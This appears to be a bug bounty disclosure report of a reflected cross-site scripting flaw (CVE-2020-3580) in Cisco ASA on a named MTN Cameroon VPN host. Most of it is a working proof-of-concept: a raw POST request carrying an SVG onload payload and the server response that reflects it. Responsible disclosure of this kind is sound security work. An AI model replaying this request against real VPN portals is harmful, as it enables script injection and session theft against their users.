Reflected Cross Site Scripting Cisco ASA on myvpn.mtncameroon.net CVE-2020-3580

##Summary: Hello, I would like report this vulnerability to MTN, Cross Site Scripting on Cisco ASA CVE-2020-3580. Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. ##Steps To Reproduce: ###how we can reproduce the issue; 1.Go to https://myvpn.mtncameroon.net ; 2. Intercept request with burp suite and send this "POST" Request, we will see response with JavaScript .. * Request ``` POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: myvpn.mtncameroon.net Cookie: webvpnlogin=1; webvpnLang=en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Te: trailers Connection: close Content-Length: 42 SAMLResponse="><svg/onload=alert('Renzi')> ``` * Response ```html HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Pragma: no-cache Connection: Keep-Alive Date: Wed, 30 Jun 2021 00:59:25 GMT X-Frame-Options: SAMEORIGIN Content-Length: 761 <html> <head> <script> function submit_saml() { document.cookie = "webvpnlogin=1; path=/; secure"; document.createElement('form').submit.call(document.getElementById('samlform')); } </script> </head> <body onload="submit_saml()"> <form id="samlform" action="/+webvpn+/index.html" method="POST"> <input type="hidden" name="tgroup" value=""> <input type="hidden" name="next" value=""> <input type="hidden" name="tgcookieset" value=""> <input type="hidden" name="group_list" value="a"> <input type="hidden" name="username" value=""> <input type="hidden" name="password" value=""> <input type="hidden" name="SAMLResponse" value=""><svg/onload=alert('Renzi')>"> <input type="submit" name="Login" value="Login" style="display:none;"> </form> </body> </html> ``` 3.Response with JavaScript alert, Proof of Concept XSS. {F1358622} ##Supporting Material/References: * https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-asaftd-xss-multiple-FCB3vPZe.html * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3580 ## Impact A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information.